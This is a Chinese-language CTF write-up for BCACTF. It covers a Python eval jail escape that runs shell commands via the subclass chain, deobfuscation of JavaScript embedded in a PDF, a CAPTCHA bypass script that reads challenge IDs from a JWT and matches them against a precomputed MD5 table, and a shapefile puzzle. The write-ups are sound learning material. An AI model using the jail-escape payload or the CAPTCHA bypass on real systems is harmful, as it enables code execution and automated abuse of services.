BCACTF

写在前面

国外的赛题还是挺有趣的，更偏脑洞一些。正值期末周，简单写两题当作娱乐放松了~。

MathJail - misc

描述

Just a fun python calculator! Good for math class.

解题

1. 查看附件，如下。

   print("Welcome to your friendly python calculator!")
   equation = input("Enter your equation below and I will give you the answer:\n")
   while equation!="e":
       answer = eval(equation, {"__builtins__":{}},{})
       print(f"Here is your answer: {answer}")
       equation = input("Enter your next equation below (type 'e' to exit):\n")
   print("Goodbye!")

2. 考点为删除了__builtins__的pyjail。参考 https://xz.aliyun.com/t/12647?time__1311=mqmhDvqIrrGNDQtiQGkI5YxWuFxjoOTD#toc-22 ，使用继承链条来绕过。

┌──(kali㉿kali)-[~/桌面]
└─$ nc challs.bcactf.com 31289

Welcome to your friendly python calculator!
Enter your equation below and I will give you the answer:
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if x.__name__=="_wrap_close"][0]["system"]("ls")
flag.txt
pycalculator.py
ynetd
ynetd.c
Here is your answer: 0
Enter your next equation below (type 'e' to exit):
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if x.__name__=="_wrap_close"][0]["system"]("cat flag.txt")
bcactf{math_is_so_difficult_right?8943yfg09whgh3r89ghwerp}Here is your answer: 0

magic - foren

描述

I found this piece of paper on the floor. I was going to throw it away, but it somehow screamed at me while I was holding it?!

hints: the pdf should be interactive; if not, try changing your pdf viewer

附件

https://arcs-s3-repo.nyc3.cdn.digitaloceanspaces.com/magic/magic.pdf

解题

1. 打开magic.pdf，发现可交互，推测内嵌了JavaScript脚本。
2. 使用Acrobat pdf reader打开，提取出一串混淆过的JavaScript代码。

var _thereisdjs=true;
    (function(_0x18b13a,_0x4d582d){var _0x3da883=_0x4113,_0x1d0353=_0x18b13a();while(!![]){try{var _0x10c45c=parseInt(_0x3da883(0x1be))/0x1*(-parseInt(_0x3da883(0x1cc))/0x2)+parseInt(_0x3da883(0x1c2))/0x3+parseInt(_0x3da883(0x1c6))/0x4*(parseInt(_0x3da883(0x1c7))/0x5)+-parseInt(_0x3da883(0x1cb))/0x6*(parseInt(_0x3da883(0x1c1))/0x7)+-parseInt(_0x3da883(0x1ca))/0x8+parseInt(_0x3da883(0x1c0))/0x9+parseInt(_0x3da883(0x1c4))/0xa*(parseInt(_0x3da883(0x1bf))/0xb);if(_0x10c45c===_0x4d582d)break;else _0x1d0353['push'](_0x1d0353['shift']());}catch(_0x53c9c0){_0x1d0353['push'](_0x1d0353['shift']());}}}(_0x43c8,0xe20be));function _0x4113(_0x44cfd2,_0x23b14b){var _0x43c873=_0x43c8();return _0x4113=function(_0x4113e1,_0x43c2ed){_0x4113e1=_0x4113e1-0x1bd;var _0x2522f0=_0x43c873[_0x4113e1];return _0x2522f0;},_0x4113(_0x44cfd2,_0x23b14b);}function _0x43c8(){var _0x1355d8=['getField','charCodeAt','100554TvjbzQ','11jHxsKn','7564617EnopjV','2219BJkXWe','3372363teHOVr','alert','5165870pcLTuS','producer','32KYViix','925835vZTXso','Flag is incorrect!','length','8132288HsoZUP','13494jFFdda','26rtwUNT'];_0x43c8=function(){return _0x1355d8;};return _0x43c8();}function update(){var _0x3d0e72=_0x4113,_0x2923fd=this[_0x3d0e72(0x1cd)]('A')['value'],_0x12e8ec=[];for(var _0x28002d=0x0;_0x28002d<_0x2923fd[_0x3d0e72(0x1c9)];_0x28002d++){_0x12e8ec['push'](_0x2923fd[_0x3d0e72(0x1bd)](_0x28002d)^parseInt(info[_0x3d0e72(0x1c5)])%(0x75+_0x28002d));}k=[0x46,0x2d,0x62,0x11,0x6b,0x4c,0x72,0x5f,0x76,0x38,0x19,0x28,0x5f,0x31,0x36,0x63,0xf7,0xb1,0x69,0x2a,0x18,0x5e,0x36,0x1,0x37,0x3a,0x1c,0x5,0x11,0x56,0xe5,0x7b,0x64,0x2c,0x11,0x14,0x53,0x5a,0x35,0x17,0x41,0x62,0x3];if(_0x12e8ec['length']!=k[_0x3d0e72(0x1c9)]){app[_0x3d0e72(0x1c3)](_0x3d0e72(0x1c8));return;}for(var _0x28002d=0x0;_0x28002d<k[_0x3d0e72(0x1c9)];_0x28002d++){if(_0x12e8ec[_0x28002d]!=k[_0x28002d]){app[_0x3d0e72(0x1c3)](_0x3d0e72(0x1c8));return;}}app[_0x3d0e72(0x1c3)]('Flag is correct!');}

3. 发现代码分为两部分，一部分为混淆加密字段的解密，另一部分update()为flag验证函数。

4. 通过本地调试 + 调用解密函数可以大致还原update()的面貌。

   function update() {
       input = this.getField('A')['value'], ans = [];
       for (var i = 0; i < input.length(); i++) {
           ans['push'](input.charCodeAt(i) ^ parseInt(info['producer']) % (117 + i));
       }
       k = [
           70, 45, 98, 17, 107, 76, 114, 95, 118, 56, 25, 40, 95, 49, 54, 99, 247, 177, 105, 42, 24, 94, 54, 1, 55, 58, 28, 5, 17, 86, 229, 123, 100, 44, 17, 20, 83, 90, 53, 23, 65, 98, 3
       ];
       if (ans['length'] != k.length()) {
           app.alert('Flag is incorrect!');
           return;
       }
       for (var i = 0; i < k.length(); i++) {
           if (ans[i] != k[i]) {
               app.alert('Flag is incorrect!');
               return;
           }
       }
       app.alert('Flag is correct!');
   }

5. 根据解密后的代码，已经知道了大概的逻辑，其中还有一个parseInt(info['producer'])待解决。用010 hexEditor 打开这个文件。搜索producer可以找到这样一串明文信息。

   42 0 obj
   <<
   /Author()/Title()/Subject()/Creator()/Producer(\376\377\0002\0008\0003\0005\0004\0008\0008\0009\0003\0002\0007\0004)/Keywords()
   /CreationDate (D:20240528134825-04'00')
   /ModDate (D:20240528134825-04'00')
   /Trapped /False
   /PTEX.Fullbanner (This is pdfTeX, Version 3.141592653-2.6-1.40.26 (TeX Live 2024/Arch Linux) kpathsea version 6.4.0)
   >>
   endobj

   询问gpt得知Producer字段的内容是283548893274。故update()完整代码如下：

function update() {
    input = this.getField('A').value, ans = [];
    for (var i = 0; i < input.length(); i++) {
        ans.push(input.charCodeAt(i) ^ 283548893274 % (117 + i));
    }
    k = [
        70, 45, 98, 17, 107, 76, 114, 95, 118, 56, 25, 40, 95, 49, 54, 99, 247, 177, 105, 42, 24, 94, 54, 1, 55, 58, 28, 5, 17, 86, 229, 123, 100, 44, 17, 20, 83, 90, 53, 23, 65, 98, 3
    ];
    if (ans.length() != k.length()) {
        app.alert('Flag is incorrect!');
        return;
    }
    for (var i = 0; i < k.length(); i++) {
        if (ans[i] != k[i]) {
            app.alert('Flag is incorrect!');
            return;
        }
    }
    app.alert('Flag is correct!');
}

6. 使用kmod283548893274 % (117 + i)得到原始flag

   k = [
       70, 45, 98, 17, 107, 76, 114, 95, 118, 56, 25, 40, 95, 49, 54, 99,
       247, 177, 105, 42, 24, 94, 54, 1, 55, 58, 28, 5, 17, 86, 229, 123,
       100, 44, 17, 20, 83, 90, 53, 23, 65, 98, 3
   ]
   flag = ''
   for i in range(len(k)):
       char_code = k[i] ^ 283548893274 % (117 + i)
       flag += str(chr(char_code))
   print(flag)

Fogblaze

描述

Can you bypass this website’s new stateless CAPTCHA system?

Hints: The challengeId for “SCLN” would be 1e8298221a767bb37c01eb0cc61d1775

解题

1. 进入网站后，发现需要验证码。

   

2. 开启抓包，大写输入验证码后进入到一级目录。

   

3. 抓包结果有两种类型的包。一种是初始化验证码。

   POST /captcha HTTP/1.1
   Accept: */*
   Accept-Encoding: gzip, deflate
   Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
   Cache-Control: no-cache
   Content-Length: 15
   DNT: 1
   Host: challs.bcactf.com:30311
   Origin: http://challs.bcactf.com:30311
   Pragma: no-cache
   Proxy-Connection: keep-alive
   Referer: http://challs.bcactf.com:30311/captcha?destination=/
   User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Edg/125.0.0.0
   content-type: application/json
   
   {"routeId":"/"}

返回的内容为captchaToken - 验证码token, image - 验证码图片base64, solved - 已解出题数, total - 总共题数, done - 是否通关

{
    "captchaToken": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJjYXB0Y2hhSWQiOiI5YTYxN2M3Mi1iZjg4LTQ0OTAtODhiMi1jNzUxNTA2NDQ5MjEiLCJyb3V0ZUlkIjoiLyIsImNoYWxsZW5nZUlkIjoiODZjOWNmNGUzNWViMDlkZGJkMWI4OGFkNTI0YmMwMmYiLCJzb2x2ZWQiOjAsInRvdGFsIjoyLCJkb25lIjpmYWxzZSwiaWF0IjoxNzE4MDI4NTM5LCJleHAiOjE3MTgwMjg1OTl9.FNLAdC0D0ltnSnZWkwUSkyyA3oB0Hag6afygwAAOc30",
    "image": ""data:image/png;base64,iVBORw0KGgoAAAAN....",
    "solved": 0,
    "total": 2,
    "done": false
}

另一种是解题数据包，请求头与上一种相同，但payload为

{"captchaToken":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJjYXB0Y2hhSWQiOiI5YTYxN2M3Mi1iZjg4LTQ0OTAtODhiMi1jNzUxNTA2NDQ5MjEiLCJyb3V0ZUlkIjoiLyIsImNoYWxsZW5nZUlkIjoiODZjOWNmNGUzNWViMDlkZGJkMWI4OGFkNTI0YmMwMmYiLCJzb2x2ZWQiOjAsInRvdGFsIjoyLCJkb25lIjpmYWxzZSwiaWF0IjoxNzE4MDI4NTM5LCJleHAiOjE3MTgwMjg1OTl9.FNLAdC0D0ltnSnZWkwUSkyyA3oB0Hag6afygwAAOc30","word":"BEGI"}

需要captchaToken和word。

4. 进入到一级目录后，尝试访问The Flag，发现还是需要验证码，而且数量高达75个。

   

   先试试人工打码，结果出现了时间限制。
   尝试使用ddddocr，但是识别率堪忧，而且只要中间出错，就要重新来。
   这时候回头看了眼提示，发现1e8298221a767bb37c01eb0cc61d1775是SCLN的md5值，而且在token的第二部分，是题目相关信息的base64，其中就包含了challengeId。

   

5. 接下来生成爆破字典以及写写自动化脚本。

   import hashlib
   
   with open("./hashes.txt", "w") as f:
       for i in range(26):
           for j in range(26):
               for k in range(26):
                   for l in range(26):
                       s = chr(i + 65) + chr(j + 65) + chr(k + 65) + chr(l + 65)
                       f.write(s + " " + hashlib.md5(s.encode()).hexdigest() + "\n")

import requests, json, base64, tqdm

url = "http://challs.bcactf.com:30311/captcha"
route = "/flag"

# 初始化，获取token
headers = {"content-type": "application/json", "Connection": "Keep-Alive"}
session = requests.Session()
response = session.post(url, data=json.dumps({"routeId": route}), headers=headers)
data = json.loads(response.text)
token = data["captchaToken"]
total = data["total"]


def solve(token, word):
    payload = json.dumps({"captchaToken": token, "word": word})
    response = session.post(url, headers=headers, data=payload)
    data = json.loads(response.text)
    token = data["captchaToken"]
    return token


hashes = {}
with open("./hashes.txt", "r") as f:
    for line in f:
        word, md5 = line.replace("\n", "").split(" ")
        hashes[md5] = word


for i in tqdm.tqdm(range(total)):
    # 末尾加上=补齐
    challengeInfo = base64.standard_b64decode(token.split(".")[1] + "===")
    word = hashes[json.loads(challengeInfo)["challengeId"]]
    token = solve(token, word)
# print("Here you are:", token)
print(f"[Flag] : http://challs.bcactf.com:30311{route}?token={token}")

6. 访问链接 http://challs.bcactf.com:30311/flag?token={token} 得到flag。

sheep

描述

baa

Hints: Figure out what type of file it is and see if there are tools you can use or modify.

附件

https://arcs-s3-repo.nyc3.cdn.digitaloceanspaces.com/sheep/sheep.shp

解题

1. 参考 https://blog.csdn.net/wangming100110/article/details/133169695 ，.shp文件是一种矢量数据格式，用于存储GIS信息。

2. 使用在线网站 https://3dconvert.nsdt.cloud/ 进行文件转换后预览，得到flag。